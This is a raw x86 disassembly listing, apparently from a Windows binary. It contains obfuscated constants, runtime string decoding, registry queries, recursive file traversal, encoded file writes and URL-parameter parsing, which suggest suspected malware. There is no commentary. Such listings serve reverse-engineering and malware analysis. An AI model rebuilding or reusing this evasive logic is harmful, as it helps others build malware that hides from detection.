call sub_41E33D
push eax
push dword ptr ds:10012164h
call dword ptr ds:1000E1F8h
mov ds:10011BB4h, eax
push 100131F1h
call sub_41E33D
push eax
push dword ptr ds:10012164h
call dword ptr ds:1000E1F8h
mov ds:1000E620h, eax
push 100131E1h
call sub_41E33D
push eax
push dword ptr ds:10012164h
call dword ptr ds:1000E1F8h
mov ds:1000E0D0h, eax
push 100131CFh
call sub_41E33D
push eax
push dword ptr ds:10012164h
call dword ptr ds:1000E1F8h
mov ds:1000E0D8h, eax
push 100131C0h
call sub_41E33D
add esp, 14h
push eax
push dword ptr ds:10012164h
call dword ptr ds:1000E1F8h
mov ds:10011644h, eax
pop edi
retn
sub_420CFE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420DC2 proc near ; CODE XREF: sub_422550+BA�p
; sub_422550+F3�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 2Bh
mov edx, 2FA0BE83h
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
mov ebx, edi
mov [ebp+arg_0], bl
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:100120F0h
add edx, ds:100120D4h
sub edx, 5
cmp eax, edx
jnz short loc_420E07
mov eax, 65h
jmp loc_420E8F
; ---------------------------------------------------------------------------
loc_420E07: ; CODE XREF: sub_420DC2+39�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:10012130h
sub edx, 3
cmp eax, edx
jnz short loc_420E20
mov eax, 79h
jmp short loc_420E8F
; ---------------------------------------------------------------------------
loc_420E20: ; CODE XREF: sub_420DC2+55�j
movzx eax, [ebp+arg_0]
mov edx, ds:10012100h
dec edx
cmp eax, edx
jnz short loc_420E36
mov eax, 75h
jmp short loc_420E8F
; ---------------------------------------------------------------------------
loc_420E36: ; CODE XREF: sub_420DC2+6B�j
movzx eax, [ebp+arg_0]
mov edx, ds:100120E8h
sub edx, 3
cmp eax, edx
jnz short loc_420E4E
mov eax, 69h
jmp short loc_420E8F
; ---------------------------------------------------------------------------
loc_420E4E: ; CODE XREF: sub_420DC2+83�j
movzx eax, [ebp+arg_0]
movsx edx, word ptr ds:1001213Ch
movsx ecx, word ptr ds:100120B4h
add edx, ecx
sub edx, 8
cmp eax, edx
jnz short loc_420E70
mov eax, 6Fh
jmp short loc_420E8F
; ---------------------------------------------------------------------------
loc_420E70: ; CODE XREF: sub_420DC2+A5�j
movzx eax, [ebp+arg_0]
mov edx, ds:10012100h
movsx ecx, word ptr ds:100120A4h
add edx, ecx
sub edx, 3
cmp eax, edx
jnz short loc_420E8F
mov eax, 61h
loc_420E8F: ; CODE XREF: sub_420DC2+40�j
; sub_420DC2+5C�j ...
pop edi
pop ebx
leave
retn
sub_420DC2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420E93 proc near ; CODE XREF: sub_41DD73+9C�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call dword ptr ds:10011B98h
cmp [ebp+var_183], 1
jnz short loc_420ED9
push 100131BAh
call sub_41E33D
push eax
push edi
call dword ptr ds:1000C020h
add esp, 0Ch
loc_420ED9: ; CODE XREF: sub_420E93+2F�j
cmp [ebp+var_183], 2
jnz short loc_420EF7
push 100131B4h
call sub_41E33D
push eax
push edi
call dword ptr ds:10011634h
add esp, 0Ch
loc_420EF7: ; CODE XREF: sub_420E93+4D�j
push 100131A8h
call sub_41E33D
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10011634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
push 100131A1h
call sub_41E33D
movsx esi, word ptr ds:10012140h
add esi, ds:100120FCh
sub esi, 0Ah
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call dword ptr ds:10011614h
push 10013199h
call sub_41E33D
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10011634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
push 0FFh
lea eax, [ebp+var_FF]
push eax
mov eax, ds:10012144h
add eax, 3
push eax
push 400h
call dword ptr ds:1000E5F4h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
push 10013194h
call sub_41E33D
push eax
push edi
call dword ptr ds:1000C020h
mov [ebp+var_1A0], 0FFh
push 10013167h
call sub_41E33D
mov [ebp+var_1AC], eax
push 1001315Ah
call sub_41E33D
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_41F9C6
add esp, 70h
mov [ebp+var_1A4], eax
movsx eax, word ptr ds:1001214Ch
add eax, ds:1001210Ch
sub eax, 6
cmp [ebp+var_1A4], eax
jnz short loc_42105D
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000C020h
add esp, 8
loc_42105D: ; CODE XREF: sub_420E93+1B7�j
pop edi
pop esi
leave
retn
sub_420E93 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word ptr ds:1001214Ch
sub eax, 4
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_421093
push 1000E0F0h
lea eax, [ebp-110h]
push eax
call sub_42509D
jmp short loc_4210A4
; ---------------------------------------------------------------------------
loc_421093: ; CODE XREF: .data:0042107E�j
push 1000F260h
lea eax, [ebp-110h]
push eax
call sub_42509D
loc_4210A4: ; CODE XREF: .data:00421091�j
push 0
mov eax, ds:100120BCh
add eax, ds:100120C8h
sub eax, 5
push eax
push 4
push 0
movsx eax, word ptr ds:100120E0h
add eax, ds:100120DCh
sub eax, 10h
push eax
push 40000000h
lea eax, [ebp-110h]
push eax
call dword ptr ds:10011788h
mov [ebp-8], eax
push 2
push 0
mov eax, ds:100120D0h
movsx edx, word ptr ds:1001213Ch
add eax, edx
sub eax, 7
push eax
push dword ptr [ebp-8]
call dword ptr ds:10011B9Ch
push 10013152h
call sub_41E33D
pop ecx
push 0
lea edx, [ebp-0Ch]
push edx
movsx edx, word ptr ds:10012120h
movsx ecx, word ptr ds:100120E4h
add edx, ecx
sub edx, 0Ah
push edx
push eax
push dword ptr [ebp-8]
call dword ptr ds:10011B8Ch
push 493E0h
push 40h
call dword ptr ds:1000EA34h
mov ebx, eax
push 61A80h
push 40h
call dword ptr ds:1000EA34h
mov esi, eax
mov eax, ds:10012100h
sub eax, 3
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_421169
mov eax, [ebp+8]
inc eax
push eax
push ebx
call sub_42509D
jmp short loc_421172
; ---------------------------------------------------------------------------
loc_421169: ; CODE XREF: .data:0042115A�j
push dword ptr [ebp+8]
push ebx
call sub_42509D
loc_421172: ; CODE XREF: .data:00421167�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_421177: ; CODE XREF: .data:0042117C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_421177
mov [ebp-4], eax
mov edi, ds:100120DCh
sub edi, 8
jmp short loc_4211B2
; ---------------------------------------------------------------------------
loc_42118C: ; CODE XREF: .data:004211B5�j
movzx eax, byte ptr [ebx+edi]
mov [ebp-114h], eax
mov eax, edi
mul edi
mov [ebp-118h], eax
mov eax, [ebp-114h]
mov edx, [ebp-118h]
add eax, edx
mov [ebx+edi], al
inc edi
loc_4211B2: ; CODE XREF: .data:0042118A�j
cmp edi, [ebp-4]
jb short loc_42118C
movsx eax, word ptr ds:1001212Ch
add eax, 61A7Ch
push eax
push esi
push dword ptr [ebp-4]
push ebx
call sub_41C768
add esp, 10h
mov edi, ds:100120C8h
sub edi, 4
jmp short loc_4211F1
; ---------------------------------------------------------------------------
loc_4211DC: ; CODE XREF: .data:004211FF�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_4211E6
mov byte ptr [esi+edi], 28h
loc_4211E6: ; CODE XREF: .data:004211E0�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_4211F0
mov byte ptr [esi+edi], 29h
loc_4211F0: ; CODE XREF: .data:004211EA�j
inc edi
loc_4211F1: ; CODE XREF: .data:004211DA�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_4211F6: ; CODE XREF: .data:004211FB�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4211F6
cmp edi, eax
jb short loc_4211DC
movsx eax, word ptr ds:10012140h
movsx edx, word ptr ds:10012118h
add eax, edx
sub eax, 10h
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_421242
push 0
lea eax, [ebp-0Ch]
push eax
movsx eax, word ptr ds:10012108h
add eax, ds:100120FCh
sub eax, 7
push eax
push 10013150h
push dword ptr [ebp-8]
call dword ptr ds:10011B8Ch
loc_421242: ; CODE XREF: .data:0042121B�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_421247: ; CODE XREF: .data:0042124C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_421247
push 0
lea edx, [ebp-0Ch]
push edx
mov edx, ds:100120DCh
movsx ecx, word ptr ds:100120A4h
add edx, ecx
sub edx, 0Ch
mov edi, eax
add edi, edx
push edi
push esi
push dword ptr [ebp-8]
call dword ptr ds:10011B8Ch
push dword ptr [ebp-8]
call dword ptr ds:10010650h
push ebx
call dword ptr ds:1000E618h
push esi
call dword ptr ds:1000E618h
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421291 proc near ; CODE XREF: sub_41CE86+11F�p
; sub_421291+28A�p ...
var_26C = dword ptr -26Ch
var_268 = byte ptr -268h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = word ptr -258h
var_256 = word ptr -256h
var_252 = word ptr -252h
var_250 = word ptr -250h
var_24E = word ptr -24Eh
var_248 = dword ptr -248h
var_242 = byte ptr -242h
var_13E = byte ptr -13Eh
var_112 = byte ptr -112h
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
arg_18 = byte ptr 20h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 0
call dword ptr ds:10011630h
xor ebx, ebx
inc ebx
push 10013148h
call sub_41E33D
push [ebp+arg_0]
push eax
lea edi, [ebp+var_242]
push edi
call dword ptr ds:10011634h
add esp, 14h
lea eax, [ebp+var_13E]
push eax
lea eax, [ebp+var_242]
push eax
call dword ptr ds:1000F258h
mov [ebp+var_248], eax
movsx ecx, word ptr ds:10012120h
add ecx, ds:100120C4h
sub ecx, 0Bh
neg ecx
cmp eax, ecx
jnz loc_4214D5
mov eax, ds:100120E8h
add eax, ds:100120A8h
sub eax, 0Ah
cmp [ebp+arg_20], eax
ja loc_421592
movsx eax, word ptr ds:10012090h
mov edx, ds:10012094h
lea eax, [eax+edx+3FEh]
cmp [ebp+arg_24], eax
jnb short loc_42133D
mov eax, ds:100120D4h
add eax, 0A4h
cmp [ebp+arg_24], eax
jnz loc_421592
loc_42133D: ; CODE XREF: sub_421291+97�j
movsx eax, word ptr ds:10012090h
mov edx, ds:100120D4h
lea eax, [eax+edx+30D3Eh]
cmp [ebp+arg_24], eax
ja loc_421592
lea eax, [ebp+arg_18]
push eax
lea eax, [ebp+arg_8]
push eax
call dword ptr ds:10011780h
mov [ebp+var_260], eax
mov eax, ds:1001209Ch
movsx edx, word ptr ds:100120B4h
add eax, edx
sub eax, 8
cmp [ebp+var_260], eax
jge short loc_421394
lea edi, [ebp+var_268]
lea esi, [ebp+arg_18]
movsd
movsd
jmp short loc_42139F
; ---------------------------------------------------------------------------
loc_421394: ; CODE XREF: sub_421291+F4�j
lea edi, [ebp+var_268]
lea esi, [ebp+arg_8]
movsd
movsd
loc_42139F: ; CODE XREF: sub_421291+101�j
lea eax, [ebp+var_258]
push eax
lea eax, [ebp+var_268]
push eax
call dword ptr ds:10011778h
mov eax, ds:1001210Ch
mov edx, ds:10012094h
mov ecx, ds:100120A8h
mov esi, ds:100120DCh
mov [ebp+var_26C], esi
movzx edi, [ebp+var_24E]
movzx esi, [ebp+var_250]
lea eax, [eax+eax+36h]
imul esi, eax
mov eax, edi
add eax, esi
movzx esi, [ebp+var_252]
mov edi, ds:100120C8h
add edi, 0Fh
add edi, ds:100120B0h
imul esi, edi
mov edi, ds:100120ACh
add edi, 3Ah
imul esi, edi
add eax, esi
movzx esi, [ebp+var_256]
mov edi, ds:10012124h
add edi, 1Ch
imul esi, edi
movsx edi, word ptr ds:10012090h
add edi, 16h
imul esi, edi
lea edx, [edx+edx+3Ch]
imul esi, edx
add eax, esi
movzx edx, [ebp+var_258]
mov esi, ds:100120D4h
lea esi, [ecx+esi+8]
imul edx, esi
mov esi, ds:10012100h
add esi, 1Bh
imul edx, esi
mov esi, [ebp+var_26C]
mov edi, esi
lea esi, [esi+edi+8]
imul edx, esi
movsx esi, word ptr ds:100120E4h
lea ecx, [esi+ecx+32h]
imul edx, ecx
add eax, edx
mov [ebp+var_25C], eax
mov edx, ds:1000C024h
cmp eax, edx
ja loc_421592
sub edx, eax
movsx eax, word ptr ds:10012118h
add eax, 0Bh
cmp edx, eax
jnb loc_421592
movsx eax, word ptr ds:100120CCh
add eax, 9Dh
cmp [ebp+arg_24], eax
jz short loc_4214C3
push 0
push [ebp+arg_0]
call sub_41BEF1
add esp, 8
jmp loc_421592
; ---------------------------------------------------------------------------
loc_4214C3: ; CODE XREF: sub_421291+21E�j
push 1
push [ebp+arg_0]
call sub_41BEF1
add esp, 8
jmp loc_421592
; ---------------------------------------------------------------------------
loc_4214D5: ; CODE XREF: sub_421291+63�j
cmp [ebp+var_112], 2Eh
jz loc_42158E
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push 10013142h
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_421291
add esp, 154h
jmp short loc_42158E
; ---------------------------------------------------------------------------
loc_421528: ; CODE XREF: sub_421291+2FF�j
lea eax, [ebp+var_13E]
push eax
push [ebp+var_248]
call dword ptr ds:1000D004h
mov ebx, eax
or ebx, ebx
jz short loc_421592
cmp [ebp+var_112], 2Eh
jz short loc_42158E
lea eax, [ebp+var_112]
push eax
push [ebp+arg_0]
push 10013142h
lea eax, [ebp+var_242]
push eax
call dword ptr ds:10011634h
lea esi, [ebp+var_13E]
sub esp, 140h
mov edi, esp
mov ecx, 9Fh
rep movsw
lea edi, [ebp+var_242]
push edi
call sub_421291
add esp, 154h
loc_42158E: ; CODE XREF: sub_421291+24B�j
; sub_421291+295�j ...
or ebx, ebx
jnz short loc_421528
loc_421592: ; CODE XREF: sub_421291+7A�j
; sub_421291+A6�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_421291 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421597 proc near ; CODE XREF: sub_4242AF+E�p
; sub_4242AF+1E4�p
var_10088 = dword ptr -10088h
var_10084 = dword ptr -10084h
var_10080 = dword ptr -10080h
var_1007C = dword ptr -1007Ch
var_10078 = word ptr -10078h
var_10070 = dword ptr -10070h
var_10068 = dword ptr -10068h
var_10064 = dword ptr -10064h
var_10060 = dword ptr -10060h
var_10059 = byte ptr -10059h
var_10058 = dword ptr -10058h
var_10054 = dword ptr -10054h
var_10050 = dword ptr -10050h
var_1004C = dword ptr -1004Ch
var_10048 = dword ptr -10048h
var_10043 = byte ptr -10043h
var_44 = dword ptr -44h
var_40 = word ptr -40h
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 10088h
call sub_42507D
push ebx
push esi
push edi
mov [ebp+var_40], 8
push 10013134h
call sub_422C45
pop ecx
push eax
call dword ptr ds:1000C044h
mov [ebp+var_38], eax
lea eax, [ebp+var_2C]
push eax
lea esi, [ebp+var_40]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+arg_0]
push edi
mov edi, [edi]
call dword ptr [edi+30h]
mov ebx, eax
mov eax, ds:10012128h
movsx edx, word ptr ds:100120A4h
add eax, edx
sub eax, 5
cmp ebx, eax
jz short loc_4215FC
xor eax, eax
jmp loc_421C54
; ---------------------------------------------------------------------------
loc_4215FC: ; CODE XREF: sub_421597+5C�j
lea eax, [ebp+var_24]
push eax
push 100138A0h
mov eax, [ebp+var_2C]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10012100h
movsx edx, word ptr ds:100120E0h
add eax, edx
sub eax, 0Bh
cmp ebx, eax
jnz loc_421C49
lea eax, [ebp+var_28]
push eax
mov eax, [ebp+var_24]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
mov eax, ds:100120F8h
sub eax, 7
cmp ebx, eax
jnz loc_421C40
and [ebp+var_44], 0
movsx eax, word ptr ds:100120F4h
add eax, ds:100120FCh
sub eax, 3
mov [ebp+var_1C], eax
jmp loc_421C34
; ---------------------------------------------------------------------------
loc_421668: ; CODE XREF: sub_421597+6A3�j
mov [ebp+var_18], 2
mov eax, [ebp+var_1C]
mov [ebp+var_10], eax
lea eax, [ebp+var_4]
push eax
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_18]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_24]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
movsx eax, word ptr ds:100120A4h
add eax, ds:100120D8h
sub eax, 8
cmp ebx, eax
jnz loc_421C31
and [ebp+var_10048], 0
lea eax, [ebp+var_10048]
push eax
push 10013890h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:100120FCh
sub eax, 3
cmp ebx, eax
jnz loc_421C0D
cmp [ebp+var_10048], 0
jz loc_421C0D
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_10048]
push eax
mov edi, [eax]
call dword ptr [edi+0F8h]
mov ebx, eax
or ebx, ebx
jnz loc_421C0D
lea eax, [ebp+var_10043]
push eax
push [ebp+var_20]
call sub_41CA6C
movsx eax, word ptr ds:10012114h
movsx edx, word ptr ds:10012108h
add eax, edx
sub eax, 7
push eax
push 1000F230h
lea eax, [ebp+var_10043]
push eax
call sub_41FCE7
add esp, 14h
mov edi, ds:10012128h
add edi, 0FFFFh
cmp eax, edi
jz loc_421C0D
cmp [ebp+arg_4], 0
jz short loc_421783
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
inc eax
jmp loc_421C54
; ---------------------------------------------------------------------------
loc_421783: ; CODE XREF: sub_421597+1CD�j
and [ebp+var_1007C], 0
lea eax, [ebp+var_1007C]
push eax
push 100138C0h
mov eax, [ebp+var_4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10012134h
add eax, ds:100120D8h
sub eax, 7
cmp ebx, eax
jnz loc_421C0D
mov [ebp+var_10059], 44h
push 10013129h
call sub_41E33D
mov edi, ds:10012138h
dec edi
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41FCE7
add esp, 10h
movsx esi, word ptr ds:100120E0h
mov edx, ds:10012124h
lea esi, [esi+edx+0FFF5h]
cmp eax, esi
jz short loc_421803
mov [ebp+var_10059], 43h
loc_421803: ; CODE XREF: sub_421597+263�j
push 10013121h
call sub_41E33D
movsx edi, word ptr ds:1001212Ch
sub edi, 3
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41FCE7
add esp, 10h
movsx esi, word ptr ds:10012090h
lea edi, [eax+esi+2]
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_42183F: ; CODE XREF: sub_421597+2BE�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_421857
inc [ebp+var_10054]
jmp short loc_42183F
; ---------------------------------------------------------------------------
loc_421857: ; CODE XREF: sub_421597+2B6�j
mov eax, [ebp+var_10054]
mov edx, ds:10012094h
movsx ecx, word ptr ds:10012114h
add edx, ecx
sub edx, 3
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000C054h
mov [ebp+var_10080], eax
push 1001311Ah
call sub_41E33D
movsx edi, word ptr ds:10012108h
add edi, ds:100120A8h
sub edi, 8
push edi
push eax
lea edi, [ebp+var_10043]
push edi
call sub_41FCE7
add esp, 14h
mov esi, ds:10012094h
add esi, 3
mov edi, eax
add edi, esi
mov [ebp+var_10068], edi
mov [ebp+var_10054], edi
loc_4218D4: ; CODE XREF: sub_421597+353�j
mov eax, [ebp+var_10054]
cmp [ebp+eax+var_10043], 26h
jz short loc_4218EC
inc [ebp+var_10054]
jmp short loc_4218D4
; ---------------------------------------------------------------------------
loc_4218EC: ; CODE XREF: sub_421597+34B�j
mov eax, [ebp+var_10054]
mov edx, ds:100120D8h
add edx, ds:100120C8h
sub edx, 7
mov [ebp+eax+var_10043], dl
mov eax, [ebp+var_10068]
lea eax, [ebp+eax+var_10043]
push eax
call dword ptr ds:1000C054h
pop ecx
mov [ebp+var_10060], eax
movsx eax, word ptr ds:10012114h
add eax, ds:100120C4h
sub eax, 7
cmp [ebp+var_10080], eax
ja short loc_4219AF
movsx eax, word ptr ds:10012118h
movsx edx, word ptr ds:10012120h
add eax, edx
sub eax, 11h
mov [ebp+var_1004C], eax
jmp short loc_421997
; ---------------------------------------------------------------------------
loc_421956: ; CODE XREF: sub_421597+416�j
mov edi, [ebp+var_1004C]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000D130h[esi], 0
jz short loc_421991
mov edx, [ebp+var_10060]
cmp ds:1000C060h[esi], edx
jnz short loc_421991
mov dl, ds:1000E200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_421991
and dword ptr ds:1000D130h[edi*4], 0
loc_421991: ; CODE XREF: sub_421597+3D2�j
; sub_421597+3E1�j ...
inc [ebp+var_1004C]
loc_421997: ; CODE XREF: sub_421597+3BD�j
mov eax, ds:10012134h
add eax, 3E2h
add eax, ds:10012148h
cmp [ebp+var_1004C], eax
jb short loc_421956
loc_4219AF: ; CODE XREF: sub_421597+3A2�j
call dword ptr ds:10011770h
mov [ebp+var_10064], eax
mov eax, ds:1001209Ch
movsx edx, word ptr ds:1001212Ch
add eax, edx
sub eax, 7
mov [ebp+var_10050], eax
jmp short loc_421A24
; ---------------------------------------------------------------------------
loc_4219D4: ; CODE XREF: sub_421597+49D�j
mov edi, [ebp+var_10050]
shl edi, 2
cmp dword ptr ds:1000D130h[edi], 0
jz short loc_421A1E
mov edi, ds:10010660h[edi]
mov esi, ds:10012104h
add esi, 0EA5Eh
mov edx, ds:10012110h
sub edx, 3
imul esi, edx
add edi, esi
cmp edi, [ebp+var_10064]
jnb short loc_421A1E
mov edi, [ebp+var_10050]
and dword ptr ds:1000D130h[edi*4], 0
loc_421A1E: ; CODE XREF: sub_421597+44E�j
; sub_421597+477�j
inc [ebp+var_10050]
loc_421A24: ; CODE XREF: sub_421597+43B�j
mov eax, ds:10012098h
add eax, 3E3h
cmp [ebp+var_10050], eax
jb short loc_4219D4
mov eax, ds:100120BCh
add eax, ds:100120D4h
dec eax
mov [ebp+var_10058], eax
jmp short loc_421A60
; ---------------------------------------------------------------------------
loc_421A4A: ; CODE XREF: sub_421597+4DF�j
mov edi, [ebp+var_10058]
cmp dword ptr ds:1000D130h[edi*4], 0
jz short loc_421A78
inc [ebp+var_10058]
loc_421A60: ; CODE XREF: sub_421597+4B1�j
mov eax, ds:1001210Ch
add eax, 3E5h
add eax, ds:100120ECh
cmp [ebp+var_10058], eax
jb short loc_421A4A
loc_421A78: ; CODE XREF: sub_421597+4C1�j
mov edi, [ebp+var_10058]
mov esi, [ebp+var_10060]
mov ds:1000C060h[edi*4], esi
mov eax, edi
mov dl, [ebp+var_10059]
mov ds:1000E200h[eax], dl
movsx eax, word ptr ds:10012108h
add eax, ds:10012110h
sub eax, 0Dh
cmp [ebp+var_10080], eax
jbe loc_421B5D
mov esi, ds:10012094h
add esi, 0FFFDh
add esi, ds:10012104h
mov ds:1000EA50h[edi*2], si
mov eax, ds:10012094h
movsx edx, word ptr ds:10012118h
add eax, edx
sub eax, 9
mov [ebp+var_10088], eax
jmp short loc_421B47
; ---------------------------------------------------------------------------
loc_421AE9: ; CODE XREF: sub_421597+5C2�j
mov edi, [ebp+var_10088]
mov esi, edi
shl esi, 2
cmp dword ptr ds:1000D130h[esi], 0
jz short loc_421B41
movzx edx, word ptr ds:1000EA50h[edi*2]
movsx ecx, word ptr ds:10012118h
add ecx, 0FFF6h
cmp edx, ecx
jz short loc_421B41
mov edx, [ebp+var_10060]
cmp ds:1000C060h[esi], edx
jnz short loc_421B41
mov dl, ds:1000E200h[edi]
cmp dl, [ebp+var_10059]
jnz short loc_421B41
lea edi, ds:1000EA50h[edi*2]
inc word ptr [edi]
jmp short loc_421B74
; ---------------------------------------------------------------------------
loc_421B41: ; CODE XREF: sub_421597+565�j
; sub_421597+57E�j ...
inc [ebp+var_10088]
loc_421B47: ; CODE XREF: sub_421597+550�j
movsx eax, word ptr ds:10012108h
add eax, 3E3h
cmp [ebp+var_10088], eax
jb short loc_421AE9
jmp short loc_421B74
; ---------------------------------------------------------------------------
loc_421B5D: ; CODE XREF: sub_421597+519�j
mov edi, [ebp+var_10058]
mov esi, ds:10012134h
sub esi, 3
mov ds:1000EA50h[edi*2], si
loc_421B74: ; CODE XREF: sub_421597+5A8�j
; sub_421597+5C4�j
call dword ptr ds:10011770h
mov edi, [ebp+var_10058]
mov ds:10010660h[edi*4], eax
lea esi, ds:10012214h
mov ds:1000D130h[edi*4], esi
mov edi, [ebp+var_10058]
lea edi, ds:1000D130h[edi*4]
mov [ebp+var_10084], edi
mov eax, edi
push eax
mov esi, [eax]
call dword ptr [esi+4]
mov [ebp+var_10078], 9
mov edi, [ebp+var_10058]
lea edi, ds:1000D130h[edi*4]
mov [ebp+var_10070], edi
lea esi, [ebp+var_10078]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_1007C]
push edi
mov edi, [edi]
call dword ptr [edi+0A4h]
mov ebx, eax
inc [ebp+var_10058]
lea eax, [ebp+var_10078]
push eax
call dword ptr ds:10011BB0h
mov eax, [ebp+var_1007C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_421C0D: ; CODE XREF: sub_421597+14E�j
; sub_421597+15B�j ...
cmp [ebp+var_10048], 0
jz short loc_421C22
mov eax, [ebp+var_10048]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_421C22: ; CODE XREF: sub_421597+67D�j
cmp [ebp+var_4], 0
jz short loc_421C31
mov eax, [ebp+var_4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_421C31: ; CODE XREF: sub_421597+11C�j
; sub_421597+68F�j
inc [ebp+var_1C]
loc_421C34: ; CODE XREF: sub_421597+CC�j
mov eax, [ebp+var_28]
cmp [ebp+var_1C], eax
jb loc_421668
loc_421C40: ; CODE XREF: sub_421597+AF�j
mov eax, [ebp+var_24]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_421C49: ; CODE XREF: sub_421597+90�j
mov eax, [ebp+var_2C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
xor eax, eax
loc_421C54: ; CODE XREF: sub_421597+60�j
; sub_421597+1E7�j
pop edi
pop esi
pop ebx
leave
retn
sub_421597 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword ptr ds:1000E614h
pop edi
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov esi, [ebp+0Ch]
mov edi, [ebp+10h]
push 100138F0h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_421CA3
mov eax, [ebp+8]
mov [edi], eax
push dword ptr [edi]
mov ebx, [eax]
call dword ptr [ebx+4]
xor eax, eax
jmp short loc_421CEB
; ---------------------------------------------------------------------------
loc_421CA3: ; CODE XREF: .data:00421C91�j
push 10013870h
push esi
call dword ptr ds:10011644h
or eax, eax
jz short loc_421CC3
mov eax, [ebp+8]
mov [edi], eax
